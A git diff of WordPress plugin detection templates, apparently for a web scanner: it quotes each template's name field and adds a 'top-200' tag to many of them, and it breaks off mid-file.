ExactMetrics – Google Analytics Dashboard for WordPress (Website Stats Plugin) Detection + name: "ExactMetrics – Google Analytics Dashboard for WordPress (Website Stats Plugin) Detection" author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: google-analytics-dashboard-for-wp wpscan: https://wpscan.com/plugin/google-analytics-dashboard-for-wp - tags: tech,wordpress,plugin,top-100 + tags: tech,wordpress,plugin,top-100,top-200 requests: - method: GET diff --git a/technologies/wordpress/wordpress-google-analytics-for-wordpress.yaml b/technologies/wordpress/wordpress-google-analytics-for-wordpress.yaml index acd5741333..a217e9a951 100644 --- a/technologies/wordpress/wordpress-google-analytics-for-wordpress.yaml +++ b/technologies/wordpress/wordpress-google-analytics-for-wordpress.yaml @@ -1,7 +1,7 @@ id: wordpress-google-analytics-for-wordpress info: - name: MonsterInsights – Google Analytics Dashboard for WordPress (Website Stats Made Easy) Detection + name: "MonsterInsights – Google Analytics Dashboard for WordPress (Website Stats Made Easy) Detection" author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: google-analytics-for-wordpress wpscan: https://wpscan.com/plugin/google-analytics-for-wordpress - tags: tech,wordpress,plugin,top-100 + tags: tech,wordpress,plugin,top-100,top-200 requests: - method: GET diff --git a/technologies/wordpress/wordpress-google-listings-and-ads.yaml b/technologies/wordpress/wordpress-google-listings-and-ads.yaml index a9ccc18d46..97cc151ad9 100644 --- a/technologies/wordpress/wordpress-google-listings-and-ads.yaml +++ b/technologies/wordpress/wordpress-google-listings-and-ads.yaml @@ -1,7 +1,7 @@ id: wordpress-google-listings-and-ads info: - name: Google Listings & Ads Detection + name: "Google Listings & Ads Detection" author: ricardomaia severity: info reference: diff --git a/technologies/wordpress/wordpress-google-site-kit.yaml b/technologies/wordpress/wordpress-google-site-kit.yaml index 09c481001f..4e8a49691e 100644 --- a/technologies/wordpress/wordpress-google-site-kit.yaml +++ b/technologies/wordpress/wordpress-google-site-kit.yaml @@ -1,7 +1,7 @@ id: wordpress-google-site-kit info: - name: Site Kit by Google – Analytics, Search Console, AdSense, Speed Detection + name: "Site Kit by Google – Analytics, Search Console, AdSense, Speed Detection" author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: google-site-kit wpscan: https://wpscan.com/plugin/google-site-kit - tags: tech,wordpress,plugin,top-100 + tags: tech,wordpress,plugin,top-100,top-200 requests: - method: GET diff --git a/technologies/wordpress/wordpress-google-sitemap-generator.yaml b/technologies/wordpress/wordpress-google-sitemap-generator.yaml index 3fe6b5c61b..ddb53de961 100644 --- a/technologies/wordpress/wordpress-google-sitemap-generator.yaml +++ b/technologies/wordpress/wordpress-google-sitemap-generator.yaml @@ -1,7 +1,7 @@ id: wordpress-google-sitemap-generator info: - name: XML Sitemaps Detection + name: "XML Sitemaps Detection" author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: google-sitemap-generator wpscan: https://wpscan.com/plugin/google-sitemap-generator - tags: tech,wordpress,plugin,top-100 + tags: tech,wordpress,plugin,top-100,top-200 requests: - method: GET diff --git a/technologies/wordpress/wordpress-gtranslate.yaml b/technologies/wordpress/wordpress-gtranslate.yaml index c13d28ebc5..f18b4793e5 100644 --- a/technologies/wordpress/wordpress-gtranslate.yaml +++ b/technologies/wordpress/wordpress-gtranslate.yaml @@ -1,7 +1,7 @@ id: wordpress-gtranslate info: - name: Translate WordPress with GTranslate Detection + name: "Translate WordPress with GTranslate Detection" author: ricardomaia severity: info reference: diff --git a/technologies/wordpress/wordpress-gutenberg.yaml b/technologies/wordpress/wordpress-gutenberg.yaml index 5ef5e08b0a..103dda9964 100644 --- a/technologies/wordpress/wordpress-gutenberg.yaml +++ b/technologies/wordpress/wordpress-gutenberg.yaml @@ -1,7 +1,7 @@ id: wordpress-gutenberg info: - name: Gutenberg Detection + name: "Gutenberg Detection" author: ricardomaia severity: info reference: diff --git a/technologies/wordpress/wordpress-happy-elementor-addons.yaml b/technologies/wordpress/wordpress-happy-elementor-addons.yaml index dc59110ada..945f073ff6 100644 --- a/technologies/wordpress/wordpress-happy-elementor-addons.yaml +++ b/technologies/wordpress/wordpress-happy-elementor-addons.yaml @@ -1,7 +1,7 @@ id: wordpress-happy-elementor-addons info: - name: Happy Addons for Elementor Detection + name: "Happy Addons for Elementor Detection" author: ricardomaia severity: info reference: diff --git a/technologies/wordpress/wordpress-header-and-footer-scripts.yaml b/technologies/wordpress/wordpress-header-and-footer-scripts.yaml index b42e0f04f8..fc79a78ea2 100644 --- a/technologies/wordpress/wordpress-header-and-footer-scripts.yaml +++ b/technologies/wordpress/wordpress-header-and-footer-scripts.yaml @@ -1,7 +1,7 @@ id: wordpress-header-and-footer-scripts info: - name: Header and Footer Scripts Detection + name: "Header and Footer Scripts Detection" author: ricardomaia severity: info reference: diff --git a/technologies/wordpress/wordpress-header-footer-code-manager.yaml b/technologies/wordpress/wordpress-header-footer-code-manager.yaml index c28b9683f4..33ffe0bd05 100644 --- a/technologies/wordpress/wordpress-header-footer-code-manager.yaml +++ b/technologies/wordpress/wordpress-header-footer-code-manager.yaml @@ -1,7 +1,7 @@ id: wordpress-header-footer-code-manager info: - name: Header Footer Code Manager Detection + name: "Header Footer Code Manager Detection" author: ricardomaia severity: info reference: diff --git a/technologies/wordpress/wordpress-header-footer-elementor.yaml b/technologies/wordpress/wordpress-header-footer-elementor.yaml index ddbc28de7f..4e5b531c32 100644 --- a/technologies/wordpress/wordpress-header-footer-elementor.yaml +++ b/technologies/wordpress/wordpress-header-footer-elementor.yaml @@ -1,7 +1,7 @@ id: wordpress-header-footer-elementor info: - name: Elementor Header & Footer Builder Detection + name: "Elementor Header & Footer Builder Detection" author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: header-footer-elementor wpscan: https://wpscan.com/plugin/header-footer-elementor - tags: tech,wordpress,plugin,top-100 + tags: tech,wordpress,plugin,top-100,top-200 requests: - method: GET diff --git a/technologies/wordpress/wordpress-header-footer.yaml b/technologies/wordpress/wordpress-header-footer.yaml index 0f84e844a1..591ec75beb 100644 --- a/technologies/wordpress/wordpress-header-footer.yaml +++ b/technologies/wordpress/wordpress-header-footer.yaml @@ -1,7 +1,7 @@ id: wordpress-header-footer info: - name: Head, Footer and Post Injections Detection + name: "Head, Footer and Post Injections Detection" author: ricardomaia severity: info reference: diff --git a/technologies/wordpress/wordpress-health-check.yaml b/technologies/wordpress/wordpress-health-check.yaml index 5ad82da89c..bc70590ca4 100644 --- a/technologies/wordpress/wordpress-health-check.yaml +++ b/technologies/wordpress/wordpress-health-check.yaml @@ -1,7 +1,7 @@ id: wordpress-health-check info: - name: Health Check & Troubleshooting Detection + name: "Health Check & Troubleshooting Detection" author: ricardomaia severity: info reference: diff --git a/technologies/wordpress/wordpress-hello-dolly.yaml b/technologies/wordpress/wordpress-hello-dolly.yaml index 9342e72432..a3d9d89a89 100644 --- a/technologies/wordpress/wordpress-hello-dolly.yaml +++ b/technologies/wordpress/wordpress-hello-dolly.yaml @@ -1,7 +1,7 @@ id: wordpress-hello-dolly info: - name: Hello Dolly Detection + name: "Hello Dolly Detection" author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: hello-dolly wpscan: https://wpscan.com/plugin/hello-dolly - tags: tech,wordpress,plugin,top-100 + tags: tech,wordpress,plugin,top-100,top-200 requests: - method: GET diff --git a/technologies/wordpress/wordpress-imagify.yaml b/technologies/wordpress/wordpress-imagify.yaml index 34d8762e56..0df1ea0ea1 100644 --- a/technologies/wordpress/wordpress-imagify.yaml +++ b/technologies/wordpress/wordpress-imagify.yaml @@ -1,7 +1,7 @@ id: wordpress-imagify info: - name: Imagify – Optimize Images & Convert WebP | Compress Images Easily Detection + name: "Imagify – Optimize Images & Convert WebP | Compress Images Easily Detection" author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: imagify wpscan: https://wpscan.com/plugin/imagify - tags: tech,wordpress,plugin,top-100 + tags: tech,wordpress,plugin,top-100,top-200 requests: - method: GET diff --git a/technologies/wordpress/wordpress-imsanity.yaml b/technologies/wordpress/wordpress-imsanity.yaml index ec1cd229bf..191da0244b 100644 --- a/technologies/wordpress/wordpress-imsanity.yaml +++ b/technologies/wordpress/wordpress-imsanity.yaml @@ -1,7 +1,7 @@ id: wordpress-imsanity info: - name: Imsanity Detection + name: "Imsanity Detection" author: ricardomaia severity: info reference: diff --git a/technologies/wordpress/wordpress-insert-headers-and-footers.yaml b/technologies/wordpress/wordpress-insert-headers-and-footers.yaml index 93743dff46..849c203c46 100644 --- a/technologies/wordpress/wordpress-insert-headers-and-footers.yaml +++ b/technologies/wordpress/wordpress-insert-headers-and-footers.yaml @@ -1,7 +1,7 @@ id: wordpress-insert-headers-and-footers info: - name: WPCode – Insert Headers and Footers + Custom Code Snippets – WordPress Code Manager Detection + name: "WPCode – Insert Headers and Footers + Custom Code Snippets – WordPress Code Manager Detection" author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: insert-headers-and-footers wpscan: https://wpscan.com/plugin/insert-headers-and-footers - tags: tech,wordpress,plugin,top-100 + tags: tech,wordpress,plugin,top-100,top-200 requests: - method: GET diff --git a/technologies/wordpress/wordpress-instagram-feed.yaml b/technologies/wordpress/wordpress-instagram-feed.yaml index 9f88191da7..f324036306 100644 --- a/technologies/wordpress/wordpress-instagram-feed.yaml +++ b/technologies/wordpress/wordpress-instagram-feed.yaml @@ -1,7 +1,7 @@ id: wordpress-instagram-feed info: - name: Smash Balloon Social Photo Feed Detection + name: "Smash Balloon Social Photo Feed Detection" author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: instagram-feed wpscan: https://wpscan.com/plugin/instagram-feed - tags: tech,wordpress,plugin,top-100 + tags: tech,wordpress,plugin,top-100,top-200 requests: - method: GET diff --git a/technologies/wordpress/wordpress-intuitive-custom-post-order.yaml b/technologies/wordpress/wordpress-intuitive-custom-post-order.yaml index 0cfa0cb97c..5a75206465 100644 --- a/technologies/wordpress/wordpress-intuitive-custom-post-order.yaml +++ b/technologies/wordpress/wordpress-intuitive-custom-post-order.yaml @@ -1,7 +1,7 @@ id: wordpress-intuitive-custom-post-order info: - name: Intuitive Custom Post Order Detection + name: "Intuitive Custom Post Order Detection" author: ricardomaia severity: info reference: diff --git a/technologies/wordpress/wordpress-iwp-client.yaml b/technologies/wordpress/wordpress-iwp-client.yaml index 827c0cc379..b43205cce1 100644 --- a/technologies/wordpress/wordpress-iwp-client.yaml +++ b/technologies/wordpress/wordpress-iwp-client.yaml @@ -1,7 +1,7 @@ id: wordpress-iwp-client info: - name: InfiniteWP Client Detection + name: "InfiniteWP Client Detection" author: ricardomaia severity: info reference: diff --git a/technologies/wordpress/wordpress-jetpack.yaml b/technologies/wordpress/wordpress-jetpack.yaml index 49384cf7fe..086b91183b 100644 --- a/technologies/wordpress/wordpress-jetpack.yaml +++ b/technologies/wordpress/wordpress-jetpack.yaml @@ -1,7 +1,7 @@ id: wordpress-jetpack info: - name: Jetpack – WP Security, Backup, Speed, & Growth Detection + name: "Jetpack – WP Security, Backup, Speed, & Growth Detection" author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: jetpack wpscan: https://wpscan.com/plugin/jetpack - tags: tech,wordpress,plugin,top-100 + tags: tech,wordpress,plugin,top-100,top-200 requests: - method: GET diff --git a/technologies/wordpress/wordpress-kadence-blocks.yaml b/technologies/wordpress/wordpress-kadence-blocks.yaml index 2b5d26998e..1211ba73e5 100644 --- a/technologies/wordpress/wordpress-kadence-blocks.yaml +++ b/technologies/wordpress/wordpress-kadence-blocks.yaml @@ -1,7 +1,7 @@ id: wordpress-kadence-blocks info: - name: Gutenberg Blocks by Kadence Blocks – Page Builder Features Detection + name: "Gutenberg Blocks by Kadence Blocks – Page Builder Features Detection" author: ricardomaia severity: info reference: diff --git a/technologies/wordpress/wordpress-kirki.yaml b/technologies/wordpress/wordpress-kirki.yaml index e114983549..15a9394eea 100644 --- a/technologies/wordpress/wordpress-kirki.yaml +++ b/technologies/wordpress/wordpress-kirki.yaml @@ -1,7 +1,7 @@ id: wordpress-kirki info: - name: Kirki Customizer Framework Detection + name: "Kirki Customizer Framework Detection" author: ricardomaia severity: info reference: diff --git a/technologies/wordpress/wordpress-leadin.yaml b/technologies/wordpress/wordpress-leadin.yaml index a787b81ace..5e09970304 100644 --- a/technologies/wordpress/wordpress-leadin.yaml +++ b/technologies/wordpress/wordpress-leadin.yaml @@ -1,7 +1,7 @@ id: wordpress-leadin info: - name: HubSpot – CRM, Email Marketing, Live Chat, Forms & Analytics Detection + name: "HubSpot – CRM, Email Marketing, Live Chat, Forms & Analytics Detection" author: ricardomaia severity: info reference: diff --git a/technologies/wordpress/wordpress-limit-login-attempts-reloaded.yaml b/technologies/wordpress/wordpress-limit-login-attempts-reloaded.yaml index 01497562af..f2d68108da 100644 --- a/technologies/wordpress/wordpress-limit-login-attempts-reloaded.yaml +++ b/technologies/wordpress/wordpress-limit-login-attempts-reloaded.yaml @@ -1,7 +1,7 @@ id: wordpress-limit-login-attempts-reloaded info: - name: Limit Login Attempts Reloaded Detection + name: "Limit Login Attempts Reloaded Detection" author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: limit-login-attempts-reloaded wpscan: https://wpscan.com/plugin/limit-login-attempts-reloaded - tags: tech,wordpress,plugin,top-100 + tags: tech,wordpress,plugin,top-100,top-200 requests: - method: GET diff --git a/technologies/wordpress/wordpress-limit-login-attempts.yaml b/technologies/wordpress/wordpress-limit-login-attempts.yaml index 161cebe4fd..c541c2e171 100644 --- a/technologies/wordpress/wordpress-limit-login-attempts.yaml +++ b/technologies/wordpress/wordpress-limit-login-attempts.yaml @@ -1,7 +1,7 @@ id: wordpress-limit-login-attempts info: - name: Limit Login Attempts Detection + name: "Limit Login Attempts Detection" author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: limit-login-attempts wpscan: https://wpscan.com/plugin/limit-login-attempts - tags: tech,wordpress,plugin,top-100 + tags: tech,wordpress,plugin,top-100,top-200 requests: - method: GET diff --git a/technologies/wordpress/wordpress-litespeed-cache.yaml b/technologies/wordpress/wordpress-litespeed-cache.yaml index e005b9ca3c..80d3a6243a 100644 --- a/technologies/wordpress/wordpress-litespeed-cache.yaml +++ b/technologies/wordpress/wordpress-litespeed-cache.yaml @@ -1,7 +1,7 @@ id: wordpress-litespeed-cache info: - name: LiteSpeed Cache Detection + name: "LiteSpeed Cache Detection" author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: litespeed-cache wpscan: https://wpscan.com/plugin/litespeed-cache - tags: tech,wordpress,plugin,top-100 + tags: tech,wordpress,plugin,top-100,top-200 requests: - method: GET diff --git a/technologies/wordpress/wordpress-loco-translate.yaml b/technologies/wordpress/wordpress-loco-translate.yaml index 46b1fb2d7e..8a859df5f3 100644 --- a/technologies/wordpress/wordpress-loco-translate.yaml +++ b/technologies/wordpress/wordpress-loco-translate.yaml @@ -1,7 +1,7 @@ id: wordpress-loco-translate info: - name: Loco Translate Detection + name: "Loco Translate Detection" author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: loco-translate wpscan: https://wpscan.com/plugin/loco-translate - tags: tech,wordpress,plugin,top-100 + tags: tech,wordpress,plugin,top-100,top-200 requests: - method: GET diff --git a/technologies/wordpress/wordpress-loginizer.yaml b/technologies/wordpress/wordpress-loginizer.yaml index 29c1a921e6..18966ecfa7 100644 --- a/technologies/wordpress/wordpress-loginizer.yaml +++ b/technologies/wordpress/wordpress-loginizer.yaml @@ -1,7 +1,7 @@ id: wordpress-loginizer info: - name: Loginizer Detection + name: "Loginizer Detection" author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: loginizer wpscan: https://wpscan.com/plugin/loginizer - tags: tech,wordpress,plugin,top-100 + tags: tech,wordpress,plugin,top-100,top-200 requests: - method: GET diff --git a/technologies/wordpress/wordpress-loginpress.yaml b/technologies/wordpress/wordpress-loginpress.yaml index de3cefa629..a9a1c19174 100644 --- a/technologies/wordpress/wordpress-loginpress.yaml +++ b/technologies/wordpress/wordpress-loginpress.yaml @@ -1,7 +1,7 @@ id: wordpress-loginpress info: - name: LoginPress | Custom Login Page Customizer Detection + name: "LoginPress | Custom Login Page Customizer Detection" author: ricardomaia severity: info reference: diff --git a/technologies/wordpress/wordpress-mailchimp-for-woocommerce.yaml b/technologies/wordpress/wordpress-mailchimp-for-woocommerce.yaml index a3355724ce..2de54c8935 100644 --- a/technologies/wordpress/wordpress-mailchimp-for-woocommerce.yaml +++ b/technologies/wordpress/wordpress-mailchimp-for-woocommerce.yaml @@ -1,7 +1,7 @@ id: wordpress-mailchimp-for-woocommerce info: - name: Mailchimp for WooCommerce Detection + name: "Mailchimp for WooCommerce Detection" author: ricardomaia severity: info reference: diff --git a/technologies/wordpress/wordpress-mailchimp-for-wp.yaml b/technologies/wordpress/wordpress-mailchimp-for-wp.yaml index 7944c420c9..f2f90f07ba 100644 --- a/technologies/wordpress/wordpress-mailchimp-for-wp.yaml +++ b/technologies/wordpress/wordpress-mailchimp-for-wp.yaml @@ -1,7 +1,7 @@ id: wordpress-mailchimp-for-wp info: - name: MC4WP Mailchimp for WordPress Detection + name: "MC4WP: Mailchimp for WordPress Detection" author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: mailchimp-for-wp wpscan: https://wpscan.com/plugin/mailchimp-for-wp - tags: tech,wordpress,plugin,top-100 + tags: tech,wordpress,plugin,top-100,top-200 requests: - method: GET diff --git a/technologies/wordpress/wordpress-mailpoet.yaml b/technologies/wordpress/wordpress-mailpoet.yaml index b37ef901c6..7ffecb1125 100644 --- a/technologies/wordpress/wordpress-mailpoet.yaml +++ b/technologies/wordpress/wordpress-mailpoet.yaml @@ -1,7 +1,7 @@ id: wordpress-mailpoet info: - name: MailPoet – emails and newsletters in WordPress Detection + name: "MailPoet – emails and newsletters in WordPress Detection" author: ricardomaia severity: info reference: diff --git a/technologies/wordpress/wordpress-maintenance.yaml b/technologies/wordpress/wordpress-maintenance.yaml index 90f2a69be1..73b1d0cd08 100644 --- a/technologies/wordpress/wordpress-maintenance.yaml +++ b/technologies/wordpress/wordpress-maintenance.yaml @@ -1,7 +1,7 @@ id: wordpress-maintenance info: - name: Maintenance Detection + name: "Maintenance Detection" author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: maintenance wpscan: https://wpscan.com/plugin/maintenance - tags: tech,wordpress,plugin,top-100 + tags: tech,wordpress,plugin,top-100,top-200 requests: - method: GET diff --git a/technologies/wordpress/wordpress-mainwp-child.yaml b/technologies/wordpress/wordpress-mainwp-child.yaml index 59218c38cf..063222962e 100644 --- a/technologies/wordpress/wordpress-mainwp-child.yaml +++ b/technologies/wordpress/wordpress-mainwp-child.yaml @@ -1,7 +1,7 @@ id: wordpress-mainwp-child info: - name: MainWP Child – Securely Connects Sites to the MainWP WordPress Manager Dashboard Detection + name: "MainWP Child – Securely Connects Sites to the MainWP WordPress Manager Dashboard Detection" author: ricardomaia severity: info reference: diff --git a/technologies/wordpress/wordpress-malcare-security.yaml b/technologies/wordpress/wordpress-malcare-security.yaml index cf60f19e49..6d1945b196 100644 --- a/technologies/wordpress/wordpress-malcare-security.yaml +++ b/technologies/wordpress/wordpress-malcare-security.yaml @@ -1,7 +1,7 @@ id: wordpress-malcare-security info: - name: MalCare WordPress Security Plugin – Malware Scanner, Cleaner, Security Firewall Detection + name: "MalCare WordPress Security Plugin – Malware Scanner, Cleaner, Security Firewall Detection" author: ricardomaia severity: info reference: diff --git a/technologies/wordpress/wordpress-megamenu.yaml b/technologies/wordpress/wordpress-megamenu.yaml index 12a28ca12b..1f244c433a 100644 --- a/technologies/wordpress/wordpress-megamenu.yaml +++ b/technologies/wordpress/wordpress-megamenu.yaml @@ -1,7 +1,7 @@ id: wordpress-megamenu info: - name: Max Mega Menu Detection + name: "Max Mega Menu Detection" author: ricardomaia severity: info reference: diff --git a/technologies/wordpress/wordpress-members.yaml b/technologies/wordpress/wordpress-members.yaml index 23917d1db2..4b49697d1b 100644 --- a/technologies/wordpress/wordpress-members.yaml +++ b/technologies/wordpress/wordpress-members.yaml @@ -1,7 +1,7 @@ id: wordpress-members info: - name: Members – Membership & User Role Editor Plugin Detection + name: "Members – Membership & User Role Editor Plugin Detection" author: ricardomaia severity: info reference: diff --git a/technologies/wordpress/wordpress-meta-box.yaml b/technologies/wordpress/wordpress-meta-box.yaml index b02c756603..77de3c9e24 100644 --- a/technologies/wordpress/wordpress-meta-box.yaml +++ b/technologies/wordpress/wordpress-meta-box.yaml @@ -1,7 +1,7 @@ id: wordpress-meta-box info: - name: Meta Box – WordPress Custom Fields Framework Detection + name: "Meta Box – WordPress Custom Fields Framework Detection" author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: meta-box wpscan: https://wpscan.com/plugin/meta-box - tags: tech,wordpress,plugin,top-100 + tags: tech,wordpress,plugin,top-100,top-200 requests: - method: GET diff --git a/technologies/wordpress/wordpress-ml-slider.yaml b/technologies/wordpress/wordpress-ml-slider.yaml index eea363f5bd..e433198f91 100644 --- a/technologies/wordpress/wordpress-ml-slider.yaml +++ b/technologies/wordpress/wordpress-ml-slider.yaml @@ -1,7 +1,7 @@ id: wordpress-ml-slider info: - name: Slider, Gallery, and Carousel by MetaSlider – Responsive WordPress Plugin Detection + name: "Slider, Gallery, and Carousel by MetaSlider – Responsive WordPress Plugin Detection" author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: ml-slider wpscan: https://wpscan.com/plugin/ml-slider - tags: tech,wordpress,plugin,top-100 + tags: tech,wordpress,plugin,top-100,top-200 requests: - method: GET diff --git a/technologies/wordpress/wordpress-newsletter.yaml b/technologies/wordpress/wordpress-newsletter.yaml index 2c82b5dd17..f72effff19 100644 --- a/technologies/wordpress/wordpress-newsletter.yaml +++ b/technologies/wordpress/wordpress-newsletter.yaml @@ -1,7 +1,7 @@ id: wordpress-newsletter info: - name: Newsletter – Send awesome emails from WordPress Detection + name: "Newsletter – Send awesome emails from WordPress Detection" author: ricardomaia severity: info reference: diff --git a/technologies/wordpress/wordpress-nextend-facebook-connect.yaml b/technologies/wordpress/wordpress-nextend-facebook-connect.yaml index 1c2f0ce0e0..7745e22a42 100644 --- a/technologies/wordpress/wordpress-nextend-facebook-connect.yaml +++ b/technologies/wordpress/wordpress-nextend-facebook-connect.yaml @@ -1,7 +1,7 @@ id: wordpress-nextend-facebook-connect info: - name: Nextend Social Login and Register Detection + name: "Nextend Social Login and Register Detection" author: ricardomaia severity: info reference: diff --git a/technologies/wordpress/wordpress-nextgen-gallery.yaml b/technologies/wordpress/wordpress-nextgen-gallery.yaml index 4169deca8a..79a5bbfd65 100644 --- a/technologies/wordpress/wordpress-nextgen-gallery.yaml +++ b/technologies/wordpress/wordpress-nextgen-gallery.yaml @@ -1,7 +1,7 @@ id: wordpress-nextgen-gallery info: - name: WordPress Gallery Plugin – NextGEN Gallery Detection + name: "WordPress Gallery Plugin – NextGEN Gallery Detection" author: ricardomaia severity: info reference: diff --git a/technologies/wordpress/wordpress-ninja-forms.yaml b/technologies/wordpress/wordpress-ninja-forms.yaml index ee83a4268b..03bcd5b0eb 100644 --- a/technologies/wordpress/wordpress-ninja-forms.yaml +++ b/technologies/wordpress/wordpress-ninja-forms.yaml @@ -1,7 +1,7 @@ id: wordpress-ninja-forms info: - name: Ninja Forms Contact Form – The Drag and Drop Form Builder for WordPress Detection + name: "Ninja Forms Contact Form – The Drag and Drop Form Builder for WordPress Detection" author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: ninja-forms wpscan: https://wpscan.com/plugin/ninja-forms - tags: tech,wordpress,plugin,top-100 + tags: tech,wordpress,plugin,top-100,top-200 requests: - method: GET diff --git a/technologies/wordpress/wordpress-ocean-extra.yaml b/technologies/wordpress/wordpress-ocean-extra.yaml index 0c6cd27edc..696288d0dc 100644 --- a/technologies/wordpress/wordpress-ocean-extra.yaml +++ b/technologies/wordpress/wordpress-ocean-extra.yaml @@ -1,7 +1,7 @@ id: wordpress-ocean-extra info: - name: Ocean Extra Detection + name: "Ocean Extra Detection" author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: ocean-extra wpscan: https://wpscan.com/plugin/ocean-extra - tags: tech,wordpress,plugin,top-100 + tags: tech,wordpress,plugin,top-100,top-200 requests: - method: GET diff --git a/technologies/wordpress/wordpress-official-facebook-pixel.yaml b/technologies/wordpress/wordpress-official-facebook-pixel.yaml index c76f405f51..cb9084af53 100644 --- a/technologies/wordpress/wordpress-official-facebook-pixel.yaml +++ b/technologies/wordpress/wordpress-official-facebook-pixel.yaml @@ -1,7 +1,7 @@ id: wordpress-official-facebook-pixel info: - name: Meta pixel for WordPress Detection + name: "Meta pixel for WordPress Detection" author: ricardomaia severity: info reference: diff --git a/technologies/wordpress/wordpress-one-click-demo-import.yaml b/technologies/wordpress/wordpress-one-click-demo-import.yaml index daaa099b9c..f9cdcbc1a4 100644 --- a/technologies/wordpress/wordpress-one-click-demo-import.yaml +++ b/technologies/wordpress/wordpress-one-click-demo-import.yaml @@ -1,7 +1,7 @@ id: wordpress-one-click-demo-import info: - name: One Click Demo Import Detection + name: "One Click Demo Import Detection" author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: one-click-demo-import wpscan: https://wpscan.com/plugin/one-click-demo-import - tags: tech,wordpress,plugin,top-100 + tags: tech,wordpress,plugin,top-100,top-200 requests: - method: GET diff --git a/technologies/wordpress/wordpress-optinmonster.yaml b/technologies/wordpress/wordpress-optinmonster.yaml index 4b7e596d07..7e66ca6805 100644 --- a/technologies/wordpress/wordpress-optinmonster.yaml +++ b/technologies/wordpress/wordpress-optinmonster.yaml @@ -1,7 +1,7 @@ id: wordpress-optinmonster info: - name: Popup Builder by OptinMonster – WordPress Popups for Optins, Email Newsletters and Lead Generation Detection + name: "Popup Builder by OptinMonster – WordPress Popups for Optins, Email Newsletters and Lead Generation Detection" author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: optinmonster wpscan: https://wpscan.com/plugin/optinmonster - tags: tech,wordpress,plugin,top-100 + tags: tech,wordpress,plugin,top-100,top-200 requests: - method: GET diff --git a/technologies/wordpress/wordpress-password-protected.yaml b/technologies/wordpress/wordpress-password-protected.yaml index 5204bd5485..eea08c299b 100644 --- a/technologies/wordpress/wordpress-password-protected.yaml +++ b/technologies/wordpress/wordpress-password-protected.yaml @@ -1,7 +1,7 @@ id: wordpress-password-protected info: - name: Password Protected Detection + name: "Password Protected Detection" author: ricardomaia severity: info reference: diff --git a/technologies/wordpress/wordpress-pdf-embedder.yaml b/technologies/wordpress/wordpress-pdf-embedder.yaml index 5efbd43e1b..2185419db3 100644 --- a/technologies/wordpress/wordpress-pdf-embedder.yaml +++ b/technologies/wordpress/wordpress-pdf-embedder.yaml @@ -1,7 +1,7 @@ id: wordpress-pdf-embedder info: - name: PDF Embedder Detection + name: "PDF Embedder Detection" author: ricardomaia severity: info reference: diff --git a/technologies/wordpress/wordpress-photo-gallery.yaml b/technologies/wordpress/wordpress-photo-gallery.yaml index b076a9a38f..0679f410d3 100644 --- a/technologies/wordpress/wordpress-photo-gallery.yaml +++ b/technologies/wordpress/wordpress-photo-gallery.yaml @@ -1,7 +1,7 @@ id: wordpress-photo-gallery info: - name: Photo Gallery by 10Web – Mobile-Friendly Image Gallery Detection + name: "Photo Gallery by 10Web – Mobile-Friendly Image Gallery Detection" author: ricardomaia severity: info reference: diff --git a/technologies/wordpress/wordpress-php-compatibility-checker.yaml b/technologies/wordpress/wordpress-php-compatibility-checker.yaml index 2d4b37de93..137962d5f8 100644 --- a/technologies/wordpress/wordpress-php-compatibility-checker.yaml +++ b/technologies/wordpress/wordpress-php-compatibility-checker.yaml @@ -1,7 +1,7 @@ id: wordpress-php-compatibility-checker info: - name: PHP Compatibility Checker Detection + name: "PHP Compatibility Checker Detection" author: ricardomaia severity: info reference: diff --git a/technologies/wordpress/wordpress-pixelyoursite.yaml b/technologies/wordpress/wordpress-pixelyoursite.yaml index f074fd1c83..192bfe4df1 100644 --- a/technologies/wordpress/wordpress-pixelyoursite.yaml +++ b/technologies/wordpress/wordpress-pixelyoursite.yaml @@ -1,7 +1,7 @@ id: wordpress-pixelyoursite info: - name: PixelYourSite – Your smart PIXEL (TAG) Manager Detection + name: "PixelYourSite – Your smart PIXEL (TAG) Manager Detection" author: ricardomaia severity: info reference: diff --git a/technologies/wordpress/wordpress-polylang.yaml b/technologies/wordpress/wordpress-polylang.yaml index 5312a4efa0..8ae7c61e87 100644 --- a/technologies/wordpress/wordpress-polylang.yaml +++ b/technologies/wordpress/wordpress-polylang.yaml @@ -1,7 +1,7 @@ id: wordpress-polylang info: - name: Polylang Detection + name: "Polylang Detection" author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: polylang wpscan: https://wpscan.com/plugin/polylang - tags: tech,wordpress,plugin,top-100 + tags: tech,wordpress,plugin,top-100,top-200 requests: - method: GET diff --git a/technologies/wordpress/wordpress-popup-builder.yaml b/technologies/wordpress/wordpress-popup-builder.yaml index f5eb59f76f..1469f1d84f 100644 --- a/technologies/wordpress/wordpress-popup-builder.yaml +++ 